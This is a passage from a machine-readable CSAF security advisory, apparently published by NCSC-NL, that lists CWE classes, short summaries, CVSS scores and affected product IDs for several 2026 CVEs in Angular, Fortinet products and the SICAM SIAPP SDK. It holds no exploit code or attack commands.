"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-69277"
},
{
"cve": "CVE-2026-22610",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"title": "CWE-79"
},
{
"category": "other",
"text": "CWE-1035",
"title": "CWE-1035"
},
{
"category": "other",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "description",
"text": "A Cross-Site Scripting (XSS) vulnerability in the Angular Template Compiler allows for arbitrary JavaScript execution via improperly sanitized SVG `\u003cscript\u003e` attributes, affecting several Red Hat products with a moderate severity rating.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-22610 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-22610.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.0,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2026-22610"
},
{
"cve": "CVE-2026-24858",
"cwe": {
"id": "CWE-288",
"name": "Authentication Bypass Using an Alternate Path or Channel"
},
"notes": [
{
"category": "other",
"text": "Authentication Bypass Using an Alternate Path or Channel",
"title": "CWE-288"
},
{
"category": "description",
"text": "Multiple Fortinet products including FortiAnalyzer, FortiManager, FortiOS, and FortiProxy have an authentication bypass vulnerability exploitable via FortiCloud SSO, allowing attackers with FortiCloud credentials to access other users\u0027 devices.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-24858 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-24858.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2026-24858"
},
{
"cve": "CVE-2026-25569",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"notes": [
{
"category": "other",
"text": "Out-of-bounds Write",
"title": "CWE-787"
},
{
"category": "description",
"text": "An out-of-bounds write vulnerability in the SICAM SIAPP SDK could allow attackers to cause denial of service or execute arbitrary code, posing significant security risks.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-25569 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-25569.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2026-25569"
},
{
"cve": "CVE-2026-25570",
"cwe": {
"id": "CWE-121",
"name": "Stack-based Buffer Overflow"
},
"notes": [
{
"category": "other",
"text": "Stack-based Buffer Overflow",
"title": "CWE-121"
},
{
"category": "description",
"text": "The SICAM SIAPP SDK contains a vulnerability caused by insufficient input validation, which may result in stack overflow, enabling potential code execution and denial of service attacks.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-25570 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-25570.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2026-25570"
},
{
"cve": "CVE-2026-25571",
"cwe": {
"id": "CWE-130",
"name": "Improper Handling of Length Parameter Inconsistency"
},
"notes": [
{
"category": "other",
"text": "Improper Handling of Length Parameter Inconsistency",
"title": "CWE-130"
},
{
"category": "description",
"text": "The SICAM SIAPP SDK client component contains a stack overflow vulnerability caused by insufficient maximum length checks on certain variables, which can result in process crashes and denial of service.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-25571 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-25571.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
